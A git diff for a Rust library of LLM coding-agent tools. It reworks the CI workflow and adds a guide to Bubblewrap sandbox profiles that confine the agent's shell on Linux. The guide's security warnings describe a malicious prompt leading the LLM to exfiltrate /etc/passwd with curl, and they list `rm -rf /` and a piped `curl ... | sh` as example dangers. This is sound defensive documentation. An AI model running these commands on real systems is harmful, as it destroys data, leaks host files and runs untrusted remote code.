diff --git a/.github/workflows/rust.yml b/.github/workflows/rust.yml index 37f6b714..25dbca89 100644 --- a/.github/workflows/rust.yml +++ b/.github/workflows/rust.yml @@ -10,146 +10,206 @@ on: workflow_dispatch: jobs: - build-and-test-async: - name: Build and Test (Async/Tokio) + ci: + name: ${{ matrix.label }} strategy: + fail-fast: false matrix: include: - - os: ubuntu-latest - target: x86_64-unknown-linux-gnu - use-cross: false - - os: windows-latest - target: x86_64-pc-windows-msvc - use-cross: false - - os: macos-latest - target: aarch64-apple-darwin - use-cross: false + - { label: "Async Linux", os: ubuntu-latest, target: x86_64-unknown-linux-gnu, mode: async, linux_bwrap: true } + - { label: "Async Windows", os: windows-latest, target: x86_64-pc-windows-msvc, mode: async, linux_bwrap: false } + - { label: "Async macOS", os: macos-latest, target: aarch64-apple-darwin, mode: async, linux_bwrap: false } + - { label: "Blocking Linux", os: ubuntu-latest, target: x86_64-unknown-linux-gnu, mode: blocking, linux_bwrap: true } + - { label: "Blocking Windows", os: windows-latest, target: x86_64-pc-windows-msvc, mode: blocking, linux_bwrap: false } + - { label: "Blocking macOS", os: macos-latest, target: aarch64-apple-darwin, mode: blocking, linux_bwrap: false } runs-on: ${{ matrix.os }} steps: - uses: actions/checkout@v6 - - name: Run Tests (Async Mode) and Upload Coverage + - name: Run tests (Async) and upload coverage + if: matrix.mode == 'async' uses: Reloaded-Project/devops-rust-test-and-coverage@v1 with: rust-project-path: ./src upload-coverage: true codecov-token: ${{ secrets.CODECOV_TOKEN }} + codecov-flags: async + codecov-name: ${{ matrix.label }} target: ${{ matrix.target }} - use-cross: ${{ matrix.use-cross }} + packages: | + llm-coding-tools-core + llm-coding-tools-agents + llm-coding-tools-serdesai + llm-coding-tools-models-dev + + - name: Run tests (Blocking) and upload coverage + if: matrix.mode == 'blocking' + uses: Reloaded-Project/devops-rust-test-and-coverage@v1 + with: + rust-project-path: ./src + upload-coverage: true + codecov-token: ${{ secrets.CODECOV_TOKEN }} + codecov-flags: blocking + codecov-name: ${{ matrix.label }} + target: ${{ matrix.target }} + packages: | + llm-coding-tools-core + llm-coding-tools-models-dev + no-default-features: true + features: "blocking" + + - name: Run Linux-only async feature coverage + if: matrix.mode == 'async' && matrix.linux_bwrap + working-directory: src + shell: bash + run: | + cargo test -p llm-coding-tools-bubblewrap + cargo test -p llm-coding-tools-core --features linux-bubblewrap + cargo test -p llm-coding-tools-serdesai --features linux-bubblewrap + + - name: Run Linux-only blocking feature coverage + if: matrix.mode == 'blocking' && matrix.linux_bwrap + working-directory: src + shell: bash + run: | + cargo test -p llm-coding-tools-bubblewrap --no-default-features --features blocking + cargo test -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap - # Note: The GitHub Runner Images will contain an up to date Rust Stable Toolchain - # thus as per recommendation of cargo-semver-checks, we're using stable here. - # - # Note to reader. If adding this to a new repo, please clear cache. - name: Run cargo-semver-checks - if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') + # Run semver checks only on Linux rows. + # Linux is the only target with additional exported APIs in this workspace + # (`linux-bubblewrap` and the bubblewrap crate itself); current Windows/macOS + # `cfg(...)` usage is implementation-only. Blocking mode still changes public + # signatures via maybe-async, so the Blocking Linux row checks that surface too. + if: (github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/')) && matrix.linux_bwrap working-directory: src shell: bash run: | - # Note: binstall is available after devops-rust-test-and-coverage@v1 call cargo +stable binstall --no-confirm cargo-semver-checks --force rustup +stable target add ${{ matrix.target }} - for CRATE in "llm-coding-tools-core" "llm-coding-tools-agents" "llm-coding-tools-serdesai" "llm-coding-tools-models-dev"; do - SEARCH_RESULT=$(cargo search "^${CRATE}$" --limit 1) - if echo "$SEARCH_RESULT" | grep -q "^${CRATE} "; then - echo "Running semver checks for ${CRATE}..." - # Note: llm-coding-tools-core has mutually exclusive async/blocking features, - # so we must use --only-explicit-features to avoid enabling all features. - # llm-coding-tools-serdesai is async-only. models-dev supports both tokio and blocking. - if [ "${CRATE}" = "llm-coding-tools-core" ]; then - cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features tokio + case "${{ matrix.mode }}" in + async) + for CRATE in "llm-coding-tools-core" "llm-coding-tools-agents" "llm-coding-tools-serdesai" "llm-coding-tools-models-dev"; do + SEARCH_RESULT=$(cargo search "^${CRATE}$" --limit 1) + if echo "$SEARCH_RESULT" | grep -q "^${CRATE} "; then + echo "Running semver checks for ${CRATE}..." + if [ "${CRATE}" = "llm-coding-tools-core" ]; then + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features tokio + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features tokio,linux-bubblewrap + elif [ "${CRATE}" = "llm-coding-tools-serdesai" ]; then + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features full + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features full,linux-bubblewrap + else + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} + fi + else + echo "No previous version of ${CRATE} found on crates.io. Skipping semver checks." + fi + done + + SEARCH_RESULT=$(cargo search "^llm-coding-tools-bubblewrap$" --limit 1) + if echo "$SEARCH_RESULT" | grep -q "^llm-coding-tools-bubblewrap "; then + echo "Running semver checks for llm-coding-tools-bubblewrap..." + cargo +stable semver-checks -p llm-coding-tools-bubblewrap --target ${{ matrix.target }} --only-explicit-features + cargo +stable semver-checks -p llm-coding-tools-bubblewrap --target ${{ matrix.target }} --only-explicit-features --features tokio + cargo +stable semver-checks -p llm-coding-tools-bubblewrap --target ${{ matrix.target }} --only-explicit-features --features blocking else - cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} + echo "No previous version of llm-coding-tools-bubblewrap found on crates.io. Skipping semver checks." fi - else - echo "No previous version of ${CRATE} found on crates.io. Skipping semver checks." - fi - done + ;; + blocking) + for CRATE in "llm-coding-tools-core" "llm-coding-tools-models-dev"; do + SEARCH_RESULT=$(cargo search "^${CRATE}$" --limit 1) + if echo "$SEARCH_RESULT" | grep -q "^${CRATE} "; then + echo "Running semver checks for ${CRATE}..." + if [ "${CRATE}" = "llm-coding-tools-core" ]; then + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features blocking + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features blocking,linux-bubblewrap + else + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features blocking + fi + else + echo "No previous version of ${CRATE} found on crates.io. Skipping semver checks." + fi + done + ;; + esac - name: Check documentation is valid if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') working-directory: src + shell: bash env: RUSTDOCFLAGS: "-D warnings" - # Note: Can't use --all-features at workspace level because tokio/blocking are mutually exclusive run: | - cargo doc -p llm-coding-tools-core --features tokio --document-private-items --no-deps --target ${{ matrix.target }} - cargo doc -p llm-coding-tools-agents --document-private-items --no-deps --target ${{ matrix.target }} - cargo doc -p llm-coding-tools-serdesai --document-private-items --no-deps --target ${{ matrix.target }} - cargo doc -p llm-coding-tools-models-dev --document-private-items --no-deps --target ${{ matrix.target }} + case "${{ matrix.mode }}:${{ matrix.linux_bwrap }}" in + async:true) + cargo doc -p llm-coding-tools-bubblewrap --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-core --features linux-bubblewrap --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-agents --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-serdesai --features linux-bubblewrap --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-models-dev --document-private-items --no-deps --target ${{ matrix.target }} + ;; + async:false) + cargo doc -p llm-coding-tools-core --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-agents --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-serdesai --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-models-dev --document-private-items --no-deps --target ${{ matrix.target }} + ;; + blocking:true) + cargo doc -p llm-coding-tools-bubblewrap --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-models-dev --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} + ;; + blocking:false) + cargo doc -p llm-coding-tools-core --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-models-dev --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} + ;; + esac - name: Run linter if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') working-directory: src - # Note: Can't use --all-features at workspace level because tokio/blocking are mutually exclusive + shell: bash run: | - cargo clippy -p llm-coding-tools-core --features tokio --target ${{ matrix.target }} -- -D warnings - cargo clippy -p llm-coding-tools-agents --target ${{ matrix.target }} -- -D warnings - cargo clippy -p llm-coding-tools-serdesai --target ${{ matrix.target }} -- -D warnings - cargo clippy -p llm-coding-tools-models-dev --target ${{ matrix.target }} -- -D warnings - - - name: Run formatter check - uses: actions-rust-lang/rustfmt@v1 - if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') - with: - manifest-path: src/Cargo.toml - - build-and-test-blocking: - name: Build and Test (Blocking) - strategy: - matrix: - include: - - os: ubuntu-latest - target: x86_64-unknown-linux-gnu - use-cross: false - - os: windows-latest - target: x86_64-pc-windows-msvc - use-cross: false - - os: macos-latest - target: aarch64-apple-darwin - use-cross: false - - runs-on: ${{ matrix.os }} + case "${{ matrix.mode }}:${{ matrix.linux_bwrap }}" in + async:true) + cargo clippy -p llm-coding-tools-bubblewrap --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-core --features linux-bubblewrap --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-agents --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-serdesai --features linux-bubblewrap --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-models-dev --target ${{ matrix.target }} -- -D warnings + ;; + async:false) + cargo clippy -p llm-coding-tools-core --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-agents --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-serdesai --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-models-dev --target ${{ matrix.target }} -- -D warnings + ;; + blocking:true) + cargo clippy -p llm-coding-tools-bubblewrap --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-models-dev --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings + ;; + blocking:false) + cargo clippy -p llm-coding-tools-core --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-models-dev --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings + ;; + esac + + format: + name: Format + runs-on: ubuntu-latest steps: - uses: actions/checkout@v6 - - name: Run Tests (Blocking Mode) and Upload Coverage - uses: Reloaded-Project/devops-rust-test-and-coverage@v1 - with: - rust-project-path: ./src - upload-coverage: true - codecov-token: ${{ secrets.CODECOV_TOKEN }} - target: ${{ matrix.target }} - use-cross: ${{ matrix.use-cross }} - packages: | - llm-coding-tools-core - llm-coding-tools-models-dev - no-default-features: true - features: "blocking" - - - name: Check documentation is valid - if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') - working-directory: src - env: - RUSTDOCFLAGS: "-D warnings" - run: | - cargo doc -p llm-coding-tools-core --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} - cargo doc -p llm-coding-tools-models-dev --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} - - - name: Run linter (Blocking) - if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') - working-directory: src - run: | - cargo clippy -p llm-coding-tools-core --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings - cargo clippy -p llm-coding-tools-models-dev --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings - - name: Run formatter check - uses: actions-rust-lang/rustfmt@v1 if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') + uses: actions-rust-lang/rustfmt@v1 with: manifest-path: src/Cargo.toml @@ -157,8 +217,7 @@ jobs: permissions: contents: write - needs: [build-and-test-async, build-and-test-blocking] - # Publish only on tags + needs: [ci, format] if: startsWith(github.ref, 'refs/tags/') runs-on: ubuntu-latest steps: @@ -167,6 +226,7 @@ jobs: with: rust-crates-io-token: ${{ secrets.CRATES_IO_TOKEN }} rust-cargo-project-paths: | + src/llm-coding-tools-bubblewrap src/llm-coding-tools-core src/llm-coding-tools-agents src/llm-coding-tools-serdesai diff --git a/README.MD b/README.MD index d6b15245..9757f16a 100644 --- a/README.MD +++ b/README.MD @@ -18,6 +18,8 @@ LLM agents: OpenCode agent markdown loader and typed catalogue - **[llm-coding-tools-serdesai](./src/llm-coding-tools-serdesai/)**: serdesAI framework-specific Tool implementations +- **[llm-coding-tools-bubblewrap](./src/llm-coding-tools-bubblewrap/)**: + Sandboxing for Bash tool on Linux based on `bwrap` tool - **[llm-coding-tools-models-dev](./src/llm-coding-tools-models-dev/)**: models.dev catalog sync with cached fallback and ETag refresh @@ -25,7 +27,7 @@ LLM agents: - **File Operations**: Read, write, edit files with line-numbered output - **Search**: Glob pattern matching and regex content search -- **Shell**: Cross-platform command execution with timeout +- **Shell**: Cross-platform command execution with timeout; with optional sandboxing on Linux. - **Web**: URL fetching with HTML-to-markdown conversion - **Path Security**: Choose between unrestricted or sandboxed file access - **OpenCode Agents**: Support for OpenCode-style agents @@ -38,6 +40,7 @@ LLM agents: - `tokio` (default): Async mode with tokio runtime - `blocking`: Sync/blocking mode, mutually exclusive with `async` +- `linux-bubblewrap`: Sandboxing for `bash` tool via Linux `bwrap` tool ## Quick Start @@ -49,6 +52,7 @@ llm-coding-tools-core = "0.2" # Framework-agnostic tool implementations llm-coding-tools-agents = "0.1" # OpenCode agent markdown loader llm-coding-tools-models-dev = "0.1" # models.dev catalog sync and cache llm-coding-tools-serdesai = "0.2" # serdesAI integration +llm-coding-tools-bubblewrap = "0.1" # Linux Bubblewrap profile and wrapper helpers ``` For a runnable agent setup, start with `llm-coding-tools-serdesai` and the @@ -75,7 +79,9 @@ cargo run --example serdesai-task -p llm-coding-tools-serdesai - [llm-coding-tools-core README](./src/llm-coding-tools-core/README.md) - [llm-coding-tools-agents README](./src/llm-coding-tools-agents/README.md) - [llm-coding-tools-serdesai README](./src/llm-coding-tools-serdesai/README.md) +- [llm-coding-tools-bubblewrap README](./src/llm-coding-tools-bubblewrap/README.md) - [llm-coding-tools-models-dev README](./src/llm-coding-tools-models-dev/README.md) +- [Sandbox profiles and operator checklist](./SANDBOX-PROFILES.md) - [Developer Guidelines](./src/AGENTS.md) ## Contributing diff --git a/SANDBOX-PROFILES.md b/SANDBOX-PROFILES.md new file mode 100644 index 00000000..acd147bb --- /dev/null +++ b/SANDBOX-PROFILES.md @@ -0,0 +1,299 @@ +# Linux Sandbox Profiles + +This guide covers the Bubblewrap-based Linux sandboxing provided by +`llm-coding-tools-bubblewrap` when the `linux-bubblewrap` feature is enabled. + +## Why Sandboxing Matters + +When an LLM runs shell commands, it can do anything the underlying process +is allowed to do: read secrets, delete files, make network requests to +exfiltrate data, and more. + +Sandboxing puts the shell inside an isolated filesystem so that only the +paths you explicitly allow are visible, and network access can be turned +off entirely. This is enforced by the kernel. + +This system is built on [bubblewrap][bwrap], a lightweight sandboxing tool +that uses Linux kernel namespaces. It is enabled via the `linux-bubblewrap` +Cargo feature flag and requires a Linux host with `bwrap` installed. + +**Important:** the sandbox never silently falls back to host execution. If +`bwrap` is missing or unusable, you get an explicit error instead. + +## The Two Profiles + +There are two preset profiles, each designed for a different trust level. + +### Public Bot + +Use this profile when the LLM is handling **untrusted or hostile input**, +for example a Discord bot or any scenario where you don't fully trust the +prompts being sent. + +Key characteristics: + +- **Network disabled.** No outbound connections at all. +- **Minimal filesystem.** Starts from an empty view of the filesystem. + Only selected system runtime roots, a writable workspace, and a synthetic + home are visible. +- **Synthetic home.** A dedicated directory replaces the real home, so + `~/.ssh` and other credential directories are never accessible. +- **Environment scrubbed.** All inherited variables are cleared and only + a sanitized system `PATH` and `HOME` are set. +- **Resolved host shell.** Commands run via a visible system `bash` or + fallback `sh`, not a home-directory or temp `PATH` entry. + +### Trusted Maintenance + +Use this profile for **trusted automation** like CI/CD pipelines, build +jobs, maintenance tasks, and similar workloads where you control the +inputs. + +Key characteristics: + +- **Network enabled.** +- **Full host `/` visible (read-only).** +- **Narrowed writable areas:** only the workspace, a synthetic home, a + cache root, and a configurable sandbox `/tmp` backing. +- **`/etc/shadow` hidden** by a memory overlay. +- **Credential mounts** via `with_credential_file_mounts`, with validation + that destinations stay within allowed directories. + +> **Security warning:** this profile is not safe for untrusted input. +> Network access remains available and the full host filesystem is +> readable. For example, a malicious prompt could trick the LLM into +> running `curl https://example.com --upload-file /etc/passwd` to +> exfiltrate host data, or use `ip addr` to reveal your network +> configuration. Use this profile only for trusted inputs. + +### Quick Comparison + +| Aspect | Public Bot | Trusted Maintenance | +| ---------------------- | ---------------------------------------------- | ----------------------------------------------------- | +| **Use case** | Untrusted / hostile input | Trusted automation (CI/CD, builds, etc.) | +| **Network** | Disabled (`--unshare-net`) | Enabled | +| **Host filesystem** | Minimal (bins, libs, workspace) | Full `/` read-only | +| **Writable paths** | Workspace, synthetic home, configurable `/tmp` | Workspace, synthetic home, cache, configurable `/tmp` | +| **Home directory** | Synthetic only | Synthetic + `/home` tmpfs overlay | +| **`/etc` visible** | No | Yes (except `/etc/shadow` tmpfs overlay) | +| **Environment** | Cleared, sanitized system `PATH` + `HOME` | Cleared, sanitized host `PATH` + XDG/build vars | +| **Credential mounts** | Not supported | Supported (validated destinations) | +| **Cache root** | Not mounted | Optional writable bind | +| **Shell** | Visible system `bash`/`sh` | Visible system `bash`/`sh` | +| **Safe for untrusted** | Yes | No | + +## How Sandboxing Works + +The sandbox starts from an **empty filesystem view**. Nothing from the host +is visible unless explicitly mounted in. This section explains the +mechanics. + +### Mount Types + +Bubblewrap provides several ways to bring paths into the sandbox: + +| Type | Flag | Effect | +| -------------- | ----------- | -------------------------------------------------------------- | +| Read-only bind | `--ro-bind` | Read-only access to a host path | +| Writable bind | `--bind` | Read-write access to a host path | +| Memory overlay | `--tmpfs` | Writable directory backed by memory; hides anything underneath | +| Symlink | `--symlink` | Creates a symlink inside the sandbox | + +### Environment Isolation + +The sandbox clears all inherited environment variables with `--clearenv`, +then rebuilds the environment using only explicitly allowed variables via +`--setenv`. This prevents secrets that might be in the parent process from +leaking into the sandbox. + +### Network Isolation + +The `--unshare-net` flag removes all network access inside the sandbox by +placing it in its own network namespace with no network interfaces. This +is used by the Public Bot profile and is a kernel-level isolation, not +just a firewall rule. + +### Process Lifecycle + +- `--die-with-parent`: the sandboxed process is killed if the parent + process exits +- `--new-session`: creates a new process session for clean signal handling +- Configurable timeouts with buffered output preservation on kill + +### LLM Awareness + +When the sandbox has network disabled, the system prompt tells the LLM that +network access is unavailable, so it can adjust its behavior accordingly. + +## Profile Details + +### Public Bot + +#### Mounts + +| Path | Type | Purpose | +| ----------------------------------------- | --------------------- | --------------------------------------------------------- | +| Selected system runtime roots (see below) | `--ro-bind` | Common system shells, binaries, and libraries (read-only) | +| `/dev` | `--dev` | Device files (minimal set) | +| `/proc` | `--proc` | Process filesystem | +| `/tmp` | `--tmpfs` or `--bind` | Temporary files; RAM-backed or caller-managed host dir | +| `/workspace` | `--bind` | Working directory (writable) | +| `/home/sandbox` | `--bind` | Synthetic home (writable) | +| `/bin`, `/lib`, `/sbin` (when needed) | `--symlink` | Compatibility links into mounted system roots | + +System runtime roots are selected from the following paths when present: + +- `/usr/bin`, `/usr/lib`, `/lib64` +- `/run/current-system/sw` (NixOS) +- `/nix/store`, `/nix/var/nix/profiles/default` (Nix) + +#### Environment + +| Variable | Value | +| -------- | ------------------------------------------------------------------------------------------------------------- | +| `PATH` | Sanitized system `PATH` derived from the host; excludes home, temp, wrapper, and per-user profile directories | +| `HOME` | `/home/sandbox` | + +#### Network + +Disabled (`--unshare-net`). + +#### Cache Root + +Not mounted. A cache root is an optional host directory for storing build +artifacts and other reusable data between sandbox runs. The Public Bot +profile intentionally leaves it out so nothing persists across sessions. + +#### Why These Mounts + +- **System runtime roots**: mounted read-only so the resolved host shell + plus common distro/Nix binaries remain available without exposing the + full host root. +- **`/dev`, `/proc`, sandbox `/tmp`**: provide the minimum runtime surface + for common tools. +- **Real home directory hidden**: prevents accidental secret disclosure + from `~/.ssh` and similar directories. +- **`/etc` omitted**: avoids host-configuration coupling and credential + exposure (no `/etc/passwd` visible). +- **Inherited env cleared**: prevents credential leakage through + environment variables. +- **User-specific and volatile roots hidden**: minimizes attack surface + and information disclosure while still allowing common system binaries. + +Note: Commands that rely on paths like `/etc/alternatives`, `/opt`, or +per-user profile bins may still need explicit extra mounts. + +### Trusted Maintenance + +#### Mounts + +| Path | Type | Purpose | +| ------------------------ | --------------------- | ----------------------------------------------------- | +| `/` | `--ro-bind` | Entire host `/` (read-only) | +| `/home` | `--tmpfs` | Writable overlay (shadows real home) | +| `/etc/shadow` | `--tmpfs` | Shadowed (prevents password hash exposure) | +| `/workspace` | `--bind` | Working directory (writable) | +| `/home/sandbox` | `--bind` | Synthetic home (writable) | +| `/cache` (if configured) | `--bind` | Cache root (writable) | +| `/dev` | `--dev` | Device files | +| `/proc` | `--proc` | Process filesystem | +| `/tmp` | `--tmpfs` or `--bind` | Temporary files on RAM or caller-managed host storage | + +#### Environment + +| Variable | Value | +| ----------------- | ---------------------------------------------------------- | +| `PATH` | Sanitized host `PATH` with hidden/volatile entries removed | +| `HOME` | `/home/sandbox` | +| `TMPDIR` | `/tmp` (matches the configured sandbox tmp backing) | +| `XDG_CACHE_HOME` | `{cache_root}/xdg-cache` | +| `XDG_CONFIG_HOME` | `/home/sandbox/.config` | +| `XDG_STATE_HOME` | `{cache_root}/xdg-state` | + +#### Network + +Enabled by default. + +#### Why These Mounts + +- **Read-only host `/`**: keeps existing toolchains usable without + rebinding every distro-specific path. +- **Writable state narrowed**: synthetic home, workspace, cache root, and + memory overlays provide necessary write locations without exposing + arbitrary host paths. +- **`/etc/shadow` shadowed**: password hashes are not exposed even though + the rest of `/etc` remains visible for compatibility. +- **XDG directories set**: build tools use cache and state directories + without polluting the synthetic home. + +## Security Notes + +### AllowedPathResolver Is Not a Shell Sandbox + +[`AllowedPathResolver`][apr] only constrains structured file tools +(`read`, `write`, `edit`, `glob`, `grep`). It does **not** make shell +execution safe. + +When the `bash` tool is enabled: + +- An LLM can run arbitrary shell commands +- Commands can read, write, or delete any file the process has OS-level + permissions for +- Examples: `cat /etc/passwd`, `rm -rf /`, + `curl https://example.invalid/install.sh | sh` + +If your threat model includes shell execution, use the Linux `bwrap` +sandbox profiles documented here, or disable shell execution entirely. + +### Anti-Patterns to Avoid + +These patterns weaken sandbox isolation: + +- **Real home bind**: mounting the actual home directory exposes SSH keys + and other secrets +- **Full credential-store mounts**: mounting `~/.ssh`, + `~/.config/gcloud`, etc. defeats isolation +- **SSH agent forwarding**: socket forwarding bypasses filesystem + restrictions entirely +- **Broad writable host roots**: writable binds to `/opt`, `/var`, etc. + increase blast radius +- **Unnecessary env passthrough**: inheriting secrets via environment + variables can leak them even with `--clearenv` + +### Best Practices + +For reproducibility and isolation: + +1. **Use a synthetic home** (e.g., `/tmp/sandbox-home-{job-id}`) rather + than the real home directory +2. **Mount cache roots explicitly** for build artifacts that should persist + between runs +3. **Set `XDG_CACHE_HOME` and `XDG_STATE_HOME`** to cache-appropriate + locations inside the sandbox + +## Pre-Deployment Checklist + +Before going into production, verify the following on your target host. +The library handles things like synthetic home setup, environment +scrubbing, and visible system-shell resolution for you. These checks cover what +depends on your environment. + +### Host + +- [ ] `bwrap` is installed and on `PATH` +- [ ] Kernel user namespaces are available (check + `sysctl kernel.unprivileged_userns_clone` if applicable) + +### Public Bot + +- [ ] No outbound network connections are possible +- [ ] No host credentials are accessible inside the sandbox +- [ ] Writes outside the workspace go to tmpfs, not the host + +### Trusted Maintenance + +- [ ] Cache and build output directories work correctly on your host +- [ ] No unintended host paths are writable from inside the sandbox + +[bwrap]: https://github.com/containers/bubblewrap +[apr]: https://docs.rs/llm-coding-tools-core/latest/llm_coding_tools_core/struct.AllowedPathResolver.html diff --git a/src/.cargo/verify.ps1 b/src/.cargo/verify.ps1 index 481ad21b..482857d8 100644 --- a/src/.cargo/verify.ps1 +++ b/src/.cargo/verify.ps1 @@ -4,6 +4,8 @@ # # Note: llm-coding-tools-serdesai is async-only. # Blocking mode is validated for core and models-dev. +# llm-coding-tools-bubblewrap is Linux-only; all bubblewrap steps +# are skipped on non-Linux platforms. $ErrorActionPreference = "Stop" @@ -30,48 +32,94 @@ $scriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path $projectRoot = Join-Path $scriptDir ".." Set-Location $projectRoot +$onLinux = $IsLinux -eq $true + try { - Write-Host "Building..." -Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--quiet") -Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-agents", "--quiet") -Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-serdesai", "--quiet") -Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-models-dev", "--quiet") - -Write-Host "Testing..." -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--quiet") -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-agents", "--quiet") -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-serdesai", "--quiet") -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-models-dev", "--quiet") - -Write-Host "Clippy..." -Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--quiet", "--", "-D", "warnings") -Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-agents", "--quiet", "--", "-D", "warnings") -Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-serdesai", "--quiet", "--", "-D", "warnings") -Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-models-dev", "--quiet", "--", "-D", "warnings") - -Write-Host "Testing blocking feature..." -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking", "--quiet") -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-models-dev", "--no-default-features", "--features", "blocking", "--quiet") - -Write-Host "Docs..." -$originalRustdocFlags = $env:RUSTDOCFLAGS -$env:RUSTDOCFLAGS = "-D warnings" -try { - Invoke-LoggedCommand "cargo" @("doc", "--workspace", "--document-private-items", "--no-deps", "--quiet") -} finally { - $env:RUSTDOCFLAGS = $originalRustdocFlags -} + Write-Host "Building (async features)..." + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-agents", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-serdesai", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-models-dev", "--quiet") + + Write-Host "Testing (async features)..." + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-agents", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-serdesai", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-models-dev", "--quiet") + + Write-Host "Clippy (async features)..." + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-agents", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-serdesai", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-models-dev", "--quiet", "--", "-D", "warnings") + + Write-Host "Building (blocking feature)..." + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-models-dev", "--no-default-features", "--features", "blocking", "--quiet") + + Write-Host "Testing (blocking feature)..." + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-models-dev", "--no-default-features", "--features", "blocking", "--quiet") + + Write-Host "Clippy (blocking feature)..." + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-models-dev", "--no-default-features", "--features", "blocking", "--quiet", "--", "-D", "warnings") + + Write-Host "Docs..." + $docArgs = @("--workspace", "--document-private-items", "--no-deps", "--quiet", "--exclude", "llm-coding-tools-bubblewrap") + $originalRustdocFlags = 